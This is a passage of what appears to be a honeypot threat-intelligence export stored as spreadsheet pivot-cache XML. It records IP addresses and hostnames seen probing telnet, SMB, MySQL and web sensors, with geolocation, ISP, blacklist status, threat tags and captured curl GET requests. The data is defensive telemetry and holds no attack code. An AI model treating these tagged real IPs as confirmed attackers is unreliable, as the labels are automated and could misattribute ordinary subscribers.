    <s v="NA"/>
    <s v="::ffff:7aca:a436"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2028"/>
    <x v="2028"/>
    <s v="FL1-119-242-38-247.iba.mesh.ad.jp&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-13T06:11:54"/>
    <d v="2025-03-22T19:00:57"/>
    <d v="2025-04-13T06:11:54"/>
    <n v="11"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="JP"/>
    <s v="Japan"/>
    <s v="13"/>
    <s v="Tokyo"/>
    <s v="Shinagawa"/>
    <s v="Shinagawa"/>
    <s v="1852140"/>
    <s v="NA"/>
    <s v="35.6103"/>
    <s v="139.748"/>
    <s v="2518"/>
    <s v="BIGLOBE Inc."/>
    <s v="BIGLOBE Inc."/>
    <s v="business"/>
    <s v="BIGLOBE"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:77f2:26f7"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2029"/>
    <x v="2029"/>
    <s v="119-47-241-200.ppp.bbiq.jp&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-13T06:10:52"/>
    <d v="2025-03-31T07:33:50"/>
    <d v="2025-04-13T06:10:52"/>
    <n v="17"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;abuseipdb"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="JP"/>
    <s v="Japan"/>
    <s v="40"/>
    <s v="Fukuoka"/>
    <s v="Fukuoka City"/>
    <s v="Fukuoka"/>
    <s v="1863967"/>
    <s v="NA"/>
    <s v="33.5922"/>
    <s v="130.399"/>
    <s v="7679"/>
    <s v="QTnet,Inc."/>
    <s v="QTnet, Inc."/>
    <s v="business"/>
    <s v="QTnet, Inc."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:772f:f1c8"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2030"/>
    <x v="2030"/>
    <s v="NA&amp;&amp;220-134-152-32.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-13T06:10:25"/>
    <d v="2024-12-08T11:01:13"/>
    <d v="2025-04-13T06:10:25"/>
    <n v="294"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H33"/>
    <s v="23&amp;&amp;57341&amp;&amp;80&amp;&amp;9100&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GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc86:9820"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2031"/>
    <x v="2031"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T06:10:22"/>
    <d v="2025-04-05T00:53:36"/>
    <d v="2025-04-13T06:10:22"/>
    <n v="7"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="445&amp;&amp;1433&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="MX"/>
    <s v="Mexico"/>
    <s v="ZAC"/>
    <s v="Zacatecas"/>
    <s v="Guadalupe"/>
    <s v="Guadalupe"/>
    <s v="4005509"/>
    <s v="NA"/>
    <s v="22.7475"/>
    <s v="-102.519"/>
    <s v="8151"/>
    <s v="Uninet S.A. de C.V."/>
    <s v="UNINET"/>
    <s v="residential"/>
    <s v="Gestión de direccionamiento UniNet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_SMB:Incoming connection (189.168.11.147,53361)}&amp;&amp;{Data_SMB:Incoming connection (189.168.11.147,53457)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:bda8:b93"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2032"/>
    <x v="2032"/>
    <s v="59-127-77-60.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-13T06:10:15"/>
    <d v="2024-09-07T19:21:00"/>
    <d v="2025-04-13T06:10:15"/>
    <n v="461"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H16&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H25"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;23&amp;&amp;80&amp;&amp;65488&amp;&amp;9100&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GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b7f:4d3c"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2033"/>
    <x v="2033"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T05:49:43"/>
    <d v="2025-04-08T07:53:37"/>
    <d v="2025-04-13T05:49:43"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>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
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7220:1369"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2034"/>
    <x v="2034"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T05:29:34"/>
    <d v="2025-04-12T10:55:09"/>
    <d v="2025-04-13T05:29:34"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H32"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="51"/>
    <s v="Odesa"/>
    <s v="Odeskyi Raion"/>
    <s v="Lymanka"/>
    <s v="9983758"/>
    <s v="NA"/>
    <s v="46.3856"/>
    <s v="30.6774"/>
    <s v="6876"/>
    <s v="TENET Scientific Production Enterprise LLC"/>
    <s v="TeNeT Networking Centre"/>
    <s v="business"/>
    <s v="TeNeT Telecommunication Company"/>
    <s v="2009-05-20"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:bc73:8d7f"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2035"/>
    <x v="2035"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T05:16:56"/>
    <d v="2025-04-13T05:16:56"/>
    <d v="2025-04-13T05:16:56"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai (Parel)"/>
    <s v="1275339"/>
    <s v="400012"/>
    <s v="19.0027"/>
    <s v="72.8286"/>
    <s v="17488"/>
    <s v="HATHWAY-NET-AP"/>
    <s v="Hathway IP over Cable Internet Access"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:744a:78c2"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2036"/>
    <x v="2036"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T05:11:21"/>
    <d v="2025-02-22T12:52:00"/>
    <d v="2025-04-13T05:11:21"/>
    <n v="10"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H34"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="NA"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="45899"/>
    <s v="VNPT Corp"/>
    <s v="VietNam Post and Telecom Corporation"/>
    <s v="business"/>
    <s v="Vietnam Posts and Telecommunications Group"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7b1f:72a6"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2037"/>
    <x v="2037"/>
    <s v="static-198-44-136-205.cust.tzulo.com&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-13T04:58:40"/>
    <d v="2025-04-04T16:45:02"/>
    <d v="2025-04-13T04:58:40"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_H43&amp;&amp;SMA-LAB_MYSQL_HC1"/>
    <s v="3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="NY"/>
    <s v="New York"/>
    <s v="New York"/>
    <s v="New York"/>
    <s v="5128581"/>
    <s v="10123"/>
    <s v="40.7831"/>
    <s v="-73.9713"/>
    <s v="11878"/>
    <s v="tzulo, inc."/>
    <s v="tzulo, inc."/>
    <s v="hosting"/>
    <s v="liu jiachang"/>
    <s v="2013-08-05"/>
    <s v="TZULO"/>
    <s v="2013-08-05"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c62c:88cd"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2038"/>
    <x v="2038"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T04:47:33"/>
    <d v="2024-02-06T16:35:00"/>
    <d v="2025-04-13T04:47:33"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="4457&amp;&amp;23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Janpath)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6296"/>
    <s v="77.2183"/>
    <s v="17813"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="business"/>
    <s v="MTNL Delhi"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7839:5d80"/>
    <s v="None"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2039"/>
    <x v="2039"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T04:46:03"/>
    <d v="2025-02-24T19:22:07"/>
    <d v="2025-04-13T04:46:03"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H33"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="BH"/>
    <s v="Bahrain"/>
    <s v="13"/>
    <s v="Manama"/>
    <s v="NA"/>
    <s v="Manama"/>
    <s v="290340"/>
    <s v="NA"/>
    <s v="26.2279"/>
    <s v="50.5857"/>
    <s v="51375"/>
    <s v="STC BAHRAIN B.S.C CLOSED"/>
    <s v="VIVA Broadband TB"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2010-08-04"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2e2a:7734"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2040"/>
    <x v="2040"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T04:45:55"/>
    <d v="2025-04-13T04:45:55"/>
    <d v="2025-04-13T04:45:55"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Janpath)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6296"/>
    <s v="77.2183"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb2:553f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2041"/>
    <x v="2041"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T04:29:43"/>
    <d v="2025-04-12T21:38:24"/>
    <d v="2025-04-13T04:29:43"/>
    <n v="127"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H19"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2000-01-13"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3d01:8a11"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2042"/>
    <x v="2042"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T04:22:43"/>
    <d v="2025-04-13T03:06:25"/>
    <d v="2025-04-13T04:22:43"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Kanniyakumari"/>
    <s v="Nagercoil"/>
    <s v="1262204"/>
    <s v="NA"/>
    <s v="8.17899"/>
    <s v="77.4323"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="MTNL Mumbai"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="2004-11-30"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb6:fabc"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2043"/>
    <x v="2043"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T04:11:18"/>
    <d v="2025-04-04T22:18:44"/>
    <d v="2025-04-13T04:11:18"/>
    <n v="5"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H17"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
